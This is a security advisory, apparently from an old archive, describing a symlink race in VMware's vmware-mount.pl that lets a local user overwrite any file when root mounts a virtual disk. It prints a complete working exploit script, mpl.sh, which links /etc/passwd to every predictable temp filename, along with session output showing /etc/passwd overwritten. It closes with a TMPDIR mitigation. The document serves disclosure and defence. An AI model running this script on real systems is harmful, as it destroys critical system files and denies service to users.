COMMAND

    VMware

SYSTEMS AFFECTED

    VMware

PROBLEM

    Paul Starzetz found following.  There is symlink vulnerability  in
    the vmware-mount.pl script which comes with lates VMware.

    While  mounting  virtual  disk  drives  using  the vmware-mount.pl
    script, a  temporary file  named vmware-mount.pl.PID  where PID is
    the current  pid of  the command  will be  created in  an insecure
    manner.  This allows an  attacker to overwrite any local  file, if
    root mounts a VMware's virtual partition (mounting is usually done
    as root).

    Example:

        paul@ps:/tmp > id
        uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
        paul@ps:/tmp > ./mpl.sh

        VMware local /etc/passwd DoS
        By Ihq.

             linking /etc/passwd to /tmp
        [+] please wait for root to run vmware-mount.pl

    After running vmware-mount.pl:

        paul@ps:/tmp > id
        uid=500 gid=100(users) Gruppen=100(users),90(firewall)

    Obviously the passwd file has been overwritten:

        paul@ps:/tmp > cat /etc/passwd

        Nr      Start       Size Type Id Sytem
        -- ---------- ---------- ---- -- ------------------------
         1         63    2096577 BIOS  C Win95 FAT32 (LBA)

    mpl.sh:

    #/bin/bash
    
    declare -i n
    declare -i mx
    
    n=2
    mx=32767
    
    echo
    echo "VMware local /etc/passwd DoS"
    echo "By Ihq."
    echo
    
    echo "     linking /etc/passwd to /tmp"
    
    while test $n -lt $mx ; do
            ln -s /etc/passwd /tmp/vmware-mount.pl.$n
            n=$(($n + 1))
    done
    
    echo "[+] please wait for root to run vmware-mount.pl"
    echo

SOLUTION

    VMWare likes to have a good, safe TMPDIR variable set:

        $ grep TMP vmware-mount.pl
          return defined($ENV{TMPDIR}) ? $ENV{TMPDIR} : "/tmp";

    This is a simple  variation on an old  theme.  Make sure  you have
    safe TMP and  TMPDIR variables set  at all times.   If you want  a
    set of scripts for safely creating such dirs and setting env  vars
    at login time, see TMPDIR scripts at

        http://www.tux.org/~peterw/